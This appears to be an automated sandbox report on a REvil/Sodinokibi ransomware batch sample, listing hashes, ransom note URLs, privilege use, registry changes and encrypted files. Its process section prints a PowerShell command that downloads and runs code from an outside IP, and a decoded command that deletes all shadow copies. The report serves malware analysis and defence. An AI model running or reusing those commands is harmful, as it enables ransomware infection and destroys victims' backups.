Analysis
- max time kernel: 23s
- max time network: 65s
- platform: windows7_x64
- resource: win7v200430
- submitted: 02-06-2020 10:10
Static task: static1
Behavioral task: behavioral1
- Sample: 421a8c43602d912fb7d54f525915eee9.bat
- Resource: win7v200430
Behavioral task: behavioral2
- Sample: 421a8c43602d912fb7d54f525915eee9.bat
- Resource: win10v200430
General
- Target: 421a8c43602d912fb7d54f525915eee9.bat
- Size: 220B
- MD5: c786b66ecefc50b20289a9d38575b5a2
- SHA1: a1851402b42988ea349215149d3ca3b2890eb425
- SHA256: bf0760cd225ed3fc4df18cf25a62e6f2f45c50f3e4726d258981e81b68e2bd65
- SHA512: 3dc1d42fda27a8b7c9e3c2b32c957f19a619d035ed0609fea3181efac5c037e516b4184659e69fc0821db6fb56f68052f7a23248c05ddac25964357dd6193a77
Malware Config
- Extracted from: http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9
- Extracted from: C:\c82t9od-readme.txt
  Family: sodinokibi
  URLs:
  - http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/A8D042B21194D3AC
  - http://decryptor.cc/A8D042B21194D3AC
Signatures
- Sodin / Sodinokibi / REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.
- Enumerates connected drives (3 TTPs)
- Modifies service (2 TTPs, 4 IoCs)
  Processes: vssvc.exe
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer (vssvc.exe)
  - Key created: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer (vssvc.exe)
- Suspicious use of WriteProcessMemory (5 IoCs)
  Processes: cmd.exe, powershell.exe
  - PID 800 (cmd.exe) wrote to memory of PID 1140 (powershell.exe)
  - PID 1140 (powershell.exe) wrote to memory of PID 1776 (powershell.exe) (4 entries)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes: powershell.exe, powershell.exe, vssvc.exe
  - Token: SeDebugPrivilege, PID 1140 (powershell.exe) (2 entries)
  - Token: SeDebugPrivilege, PID 1776 (powershell.exe)
  - Token: SeBackupPrivilege, PID 1588 (vssvc.exe)
  - Token: SeRestorePrivilege, PID 1588 (vssvc.exe)
  - Token: SeAuditPrivilege, PID 1588 (vssvc.exe)
  - Token: SeTakeOwnershipPrivilege, PID 1140 (powershell.exe)
- Drops file in Program Files directory (26 IoCs)
  Processes: powershell.exe
  - File opened for modification: \??\c:\program files\CloseCompare.001
  - File opened for modification: \??\c:\program files\ConvertFromCompare.aiff
  - File opened for modification: \??\c:\program files\DebugConnect.shtml
  - File opened for modification: \??\c:\program files\InitializeSubmit.vstm
  - File opened for modification: \??\c:\program files\MountCopy.docx
  - File opened for modification: \??\c:\program files\ProtectRevoke.xla
  - File opened for modification: \??\c:\program files\UnblockExpand.dot
  - File opened for modification: \??\c:\program files\CheckpointNew.pcx
  - File opened for modification: \??\c:\program files\ClearUnlock.snd
  - File opened for modification: \??\c:\program files\DenyAssert.3gp2
  - File opened for modification: \??\c:\program files\MergePop.gif
  - File opened for modification: \??\c:\program files\PushPop.MTS
  - File opened for modification: \??\c:\program files\RenameSplit.gif
  - File opened for modification: \??\c:\program files\SkipExpand.ttc
  - File opened for modification: \??\c:\program files\SyncExit.TS
  - File created: \??\c:\program files\c82t9od-readme.txt
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\c82t9od-readme.txt
  - File created: \??\c:\program files\microsoft sql server compact edition\c82t9od-readme.txt
  - File opened for modification: \??\c:\program files\NewMount.3gpp
  - File opened for modification: \??\c:\program files\RedoRestart.asf
  - File opened for modification: \??\c:\program files\RegisterGet.mp4
  - File opened for modification: \??\c:\program files\WatchLimit.jpeg
  - File created: \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\c82t9od-readme.txt
  - File created: \??\c:\program files (x86)\c82t9od-readme.txt
  - File opened for modification: \??\c:\program files\WatchSync.vb
  - File opened for modification: \??\c:\program files\UseWait.mpeg
- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes: PID 1140 (powershell.exe)
- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes: PID 1140 (powershell.exe) (3 entries), PID 1776 (powershell.exe) (2 entries)
- Blacklisted process makes network request (1 IoC)
  Processes: flow 4, PID 1140 (powershell.exe)
Processes
- C:\Windows\system32\cmd.exe (PID 800)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\421a8c43602d912fb7d54f525915eee9.bat"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1140)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/421a8c43602d912fb7d54f525915eee9');Invoke-GIEGCPPTNOCAU;Start-Sleep -s 10000"
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Blacklisted process makes network request
    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1776)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE and decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();})
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses
- C:\Windows\system32\vssvc.exe (PID 1588)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken